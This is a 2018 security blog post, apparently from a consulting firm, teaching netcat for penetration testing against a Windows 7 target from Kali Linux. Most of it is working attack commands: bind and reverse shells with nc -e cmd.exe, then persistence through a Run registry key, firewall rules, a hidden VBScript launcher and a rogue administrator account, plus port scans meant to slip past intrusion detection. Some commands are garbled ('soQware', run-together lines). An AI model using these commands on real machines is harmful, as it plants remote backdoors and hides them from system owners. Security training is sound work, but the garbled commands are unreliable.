Friday 23 March 2018

NETCAT


NETCAtNetcat is a computer network utility used for taking access, sending access, sending and receiving files over the internet using TCP and UDP connection. This tool is very famous for debugging the network and for investigation purpose. Netcat is also known as NC or swiss army knife. It is the most critical threat to network admins, programmers and penetration testers.


NETCAT SETUP:

Setting up netcat in windows is very simple. You download Netcat for windows from the given link  https://joncraton.org/blog/46/netcat-for-windows/.
Once you downloaded it extract the file in c directory. Then just open the command prompt and navigate to the netcat directory (yes I know we are lazy, shortcut to open a command prompt from the same directory, just got to the netcat directory hold shift and right click, and you will see an option “open command windows here” ) now run nc.exe.
In Linux netcat is pre-installed. So we don’t need to worry about it. If you don’t find in Linux, open the terminal and type “apt-get install netcat”. This command will install netcat for you.
In this blog is using Kali Linux as my attacker machine and victim machine as windows 7.

PENETRATION TESTING WITH NETCAT

Netcat is used for two primary modes of operation, one is as a client, and the other is a server. These two operations are hackers favourite, and penetration testers also use these operations.
The primary usage of the two modes is connected to somewhere and listen for inbound
connect to somewhere: nc [-options] host-name port [s]  # this syntax is for netcat client mode
listen for inbound : nc -l -p port [options] [host-name] [port] # this syntax is for netcat server mode
the most commonly used options in netcat are
-c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]

-e filename                  program to exec after connect [dangerous!!]

-l                                  listen mode, for inbound connects

-n                                 numeric-only IP addresses, no DNS

-p port                       local port number

-u                                 UDP mode

-v                                 verbose [use twice to be more verbose]

-z                                 zero-I/O mode [used for scanning]
Netcat most potent options are -e prog. This option is used in server mode, which allows netcat to execute a command on the remote system. This option will enable netcat to run the specific program when clients connect to the server.
Nc -l -p 1234 -e cmd.exe        # windows

nc -l -p 1234 -e bin/sh             # Linux
These are the basics of netcat. If you are still a beginner in netcat read this article for clear understanding  http://scitechconnect.elsevier.com/wp-content/uploads/2013/09/Introduction-to-Netcat.pdf
let’s get into real-time penetration testing with netcat
let’s get a basic reverse shell from windows 7
nc -lvp 1234  # Kali Linux

nc.exe 192.168.0.151 1234 -e cmd.exe # windows (IP mentioned is Kali IP address)
when victim enters the command, ill get a reverse shell in Kali

 POST EXPLOITATION WITH NETCAT

post exploitation is the crucial phase of penetration testing and fun part too.So here is some fun part that we can perform using netcat.
Once we get a reverse shell from the victim system, we need to do some following steps
. That’s is maintaining the connection.
All the attackers face a big problem, which is session expiration. So here are some command s to make the session persistent.
@echo offxcopy"%systemdrive%\%username%\Desktop\nc.exe""C:\Windows\System32\" -­y         

             reg add "HKLM\soQware\microsoQ\windows\currentversion\run" /f /v"system" /t REG_SZ /d            "C:\windows\system32\nc.exe-­Ldp449 -­ecmd.exe”            

netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow          protocol=UDP localport=449 

           netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow      

 program="C:\windows\system32\nc.exe "
 NOTE: this command should run as administrator

 RUNNING THE NETCAT IN BACKGROUND

Here is the vb script to run netcat in the background, so that you don’t have to wait for the user to restart their computer.
Dim objShellSet objShell = Wscript.CreateObject ("WScript.shell")objShell.run"C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

SetobjShell =  Nothing
play with firewall
netsh advfirewall set all profiles state off
Turn off windows firewall will notify the user
netsh advfirewall set allprofiles state           on      
– Turns firewall on
netsh advfirewall reset
– Reset the firewall back to  default
netsh advfirewall set all profiles firewallpolicy blockinbound,allowoutbound
– Block everything
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block           

 dir=IN
– Open Port
netsh advfirewall firewall delete rule name=" HTTP.”
– Delete Rule
schedule tasks
we can also be able to mess with windows schedule task; we can able to create, delete and run a task.
Creating Tasks
  – SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword     

  /SC HOURLY /TN rtest1 /TR notepad
Delete  Tasks
  – SCHTASKS /Delete /TN "Backup and Restore.”       
Running Tasks
SCHTASKS /Run /TN "StartBackup"
now let’s create and add a local user and granting with administrator right
net user /add briskinfosec Netcat /comment:"Approved through 3/07/2018 per CTO" /

fullname:"brisk info sec"
Netcat is used for scanning ports on the network.
nc  -v  192.168.0.170   - z 1-1000   # ip = target ip

OUTPUT:

root@7h3pr0xy:~# nc -v  192.168.0.170 -z 1-1000

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 554 (rtsp) open

(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
sometimes we need to randomise the port as well against the target to alert the IDS (intrusion detection system) or IPS (intrusion prevention system).
nc -v -r 192.168.0.170 -z 1-1000

OUTPUT

root@7h3pr0xy:~# nc -v -r 192.168.0.170 -z 1-1000

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 554 (rtsp) open
While performing penetration testing less information will not help us to move forward. So we look for more details. In netcat, we have a verbose which give more info about the target.
nc -vv -r 192.168.0.170 -z 130-140

OUTPUT:

root@7h3pr0xy:~# nc -vv -r 192.168.0.170 -z 130-140

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 131 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open

(UNKNOWN) [192.168.0.170] 130 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 134 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open

(UNKNOWN) [192.168.0.170] 133 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 140 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 132 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused

(UNKNOWN) [192.168.0.170] 138 (netbios-dgm) : Connection refused

(UNKNOWN) [192.168.0.170] 136 (?) : Connection refused

 sent 0, rcvd 0
Netcat can be used for the offensive purpose as well as defensive. If you are right programming, you can automate the executing process
NOTE: use this swiss army knife in a useful way, so no one gets hurt with a sharp edge.
Play safe and be safe

AUTHOR

Venkatesh C.S
SecurityEngineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/
Posted by at No comments:
Labels: , , ,
Subscribe to: Posts (Atom)